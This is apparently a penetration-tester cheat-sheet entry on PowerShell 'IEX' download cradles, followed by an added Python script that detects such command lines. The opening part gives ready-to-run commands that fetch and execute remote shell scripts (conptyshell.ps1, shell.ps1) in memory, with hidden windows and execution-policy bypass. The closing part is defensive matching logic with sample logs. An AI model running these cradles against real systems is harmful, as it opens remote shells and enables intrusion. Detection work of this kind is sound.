Operator On The Wire

IEX

Download a remote script and execute it in memory:

IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.41:8000/conptyshell.ps1')

powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://172.16.1.100:8000/shell.ps1')"

When passing the command through CMD, remember to escape the inner double quotes:

"cmd /c powershell -nop -exec bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.41:8000/conptyshell.ps1')\""
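Detection side of the commands above, as an added example that is not part of the original page: a Python check that flags process command lines combining IEX with Net.WebClient DownloadString and reports the accompanying switches. The indicator names, the analyze function and the sample lines (192.0.2.10, script.ps1) are constructed for this example.

```python
import re

# Indicators derived from the command lines on this page; the names are this example's own.
INDICATORS = {
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "web_download": re.compile(r"net\.webclient\b.*\.downloadstring\s*\(", re.I),
    "no_profile": re.compile(r"(?<!\S)-nop(rofile)?\b", re.I),
    "hidden_window": re.compile(r"(?<!\S)-w(indowstyle)?\s+hidden\b", re.I),
    "policy_bypass": re.compile(r"(?<!\S)-(ep|exec|executionpolicy)\s+bypass\b", re.I),
}
# Stop at whitespace, quotes, backslashes and ')' so the quoted URL is extracted cleanly.
URL = re.compile(r"https?://[^\s'\"\\)]+", re.I)

# Constructed process-creation command lines: the direct form, the CMD-wrapped
# form with escaped quotes, and a benign scheduled-task style invocation.
SAMPLE_LOG = r"""
powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10:8000/script.ps1')"
cmd /c powershell -nop -exec bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://192.0.2.10:8000/script.ps1')\"
powershell.exe -NoProfile -File C:\Scripts\backup.ps1
"""
SAMPLES = SAMPLE_LOG.strip().splitlines()


def analyze(cmdline):
    """Return matched indicators, extracted URLs and whether the line is a download cradle."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))
    # The switches alone are common in admin tooling; the cradle verdict needs
    # both the download call and the in-memory execution of its result.
    cradle = "in_memory_exec" in hits and "web_download" in hits
    return {"cradle": cradle, "hits": hits, "urls": URL.findall(cmdline)}


if __name__ == "__main__":
    for line in SAMPLES:
        result = analyze(line)
        verdict = "ALERT" if result["cradle"] else "ok"
        print(f"{verdict:5} {result['hits']} {result['urls']}")
```

Command-line matching like this misses encoded or obfuscated variants; PowerShell Script Block Logging (Event ID 4104) records the script text after decoding and is the better source for the same patterns.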